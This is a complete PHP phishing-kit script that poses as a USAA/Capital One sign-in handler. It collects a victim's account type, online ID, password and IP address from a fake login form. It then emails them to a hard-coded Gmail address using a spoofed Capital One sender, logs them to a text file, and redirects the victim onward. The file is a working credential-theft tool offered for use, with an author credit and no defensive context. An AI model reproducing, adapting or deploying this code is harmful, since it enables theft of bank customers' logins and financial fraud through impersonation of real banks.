<?
$ip = getenv("REMOTE_ADDR");

$message .= "----------= Usaa PIN Info =---------\n";

$message .= "Account Type : ".$_POST['state']."\n";
$message .= "Online ID : ".$_POST['user']."\n";
$message .= "Password : ".$_POST['pass']."\n";

$message .= "1P : ".$ip."\n";

$message .= "-------= Kreated BY lizzyrose/billiondollarsman =-------\n";

$send = "billiondollarsman2015@gmail.com";

$subject = "Capital ONE | $ip";

$headers = "From: USAA LoGin<customer-support@capitalone.com>";

$headers .= $_POST['eMailAdd']."\n";

$headers .= "MIME-Version: 1.0\n";

$arr=array($send, $IP);
foreach ($arr as $send)
{
mail($send,$subject,$message,$headers);
mail($to,$subject,$message,$headers);
}
$fp = fopen("logs.txt","a");
fputs($fp,$message);
fclose($fp);
	
		   header("Location: index2.php");

	 
?>